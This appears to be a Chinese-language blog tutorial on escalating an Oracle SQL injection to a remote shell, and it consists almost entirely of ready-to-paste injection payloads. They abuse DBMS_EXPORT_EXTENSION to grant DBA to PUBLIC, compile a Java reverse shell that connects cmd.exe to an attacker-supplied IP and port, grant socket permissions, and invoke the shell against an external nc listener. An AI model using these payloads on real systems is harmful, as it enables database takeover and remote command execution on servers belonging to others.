Oracle sql-injection 到Getshell

开始Getshell
oracle可以直接执行CMD的,但是比较麻烦,因为没有回显,所以我这里直接反弹一个shell到NC监听的外网VPS

权限不够,可以尝试提权:

‘ and (SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,’BAR’,’DBMS _OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””grant dba to public””;END;”;END;–‘,’SYS’,0,’1′,0)) is not null–

权限够的话,直接开始创建JAVA代码(利用java反弹shell){}替换为自己的 ip和端口:

‘ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,’BAR’,’DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create or replace and compile java source named “shell” as import java.io.*;import java.net.*;public class shell{public static void run() throws Exception {Socket s = new Socket(“{IP}”, {PORT});Process p = Runtime.getRuntime().exec(“cmd.exe”);new T(p.getInputStream(), s.getOutputStream()).start();new T(p.getErrorStream(), s.getOutputStream()).start();new T(s.getInputStream(), p.getOutputStream()).start();}static class T extends Thread {private InputStream i;private OutputStream u;public T(InputStream in, OutputStream out) {this.u = out;this.i = in;}public void run() {BufferedReader n = new BufferedReader(new InputStreamReader(i));BufferedWriter w = new BufferedWriter(new OutputStreamWriter(u));char f[] = new char[8192];int l;try {while ((l = n.read(f, 0, f.length)) > 0) {w.write(f, 0, l);w.flush();}} catch (IOException e) {}try {if (n != null)n.close();if (w != null)w.close();} catch (Exception e) {}}}}””;END;”;END;–‘,’SYS’,0,’1′,0) from dual) is not null–

赋予JAVA执行权限:

‘ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,’BAR’,’DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””begin dbms_java.grant_permission( ””””PUBLIC””””, ””””SYS:java.net.SocketPermission””””, ””””<>””””, ””””*”””” );end;””;END;”;END;–‘,’SYS’,0,’1′,0) from dual) is not null–

ORACLE创建函数:

‘ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,’BAR’,’DBMS_OUTPUT” .PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create or replace function reversetcp RETURN VARCHAR2 as language java name ””””shell.run() return String””””; ””;END;”;END;–‘,’SYS’,0,’1′,0) from dual) is not null–

赋予函数执行权限:

‘ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,’BAR’,’DBMS_OUTPUT” .PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””grant all on reversetcp to public””;END;”;END;–‘,’SYS’,0,’1′,0) from dual) is not null–

调用reversetcp函数,反弹shell至公网的nc监听服务器

‘ and (select sys.reversetcp from dual) is not null–

 

 

引用:

 

Oracle Sql注入利用方法

Oracle从注入到命令执行

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注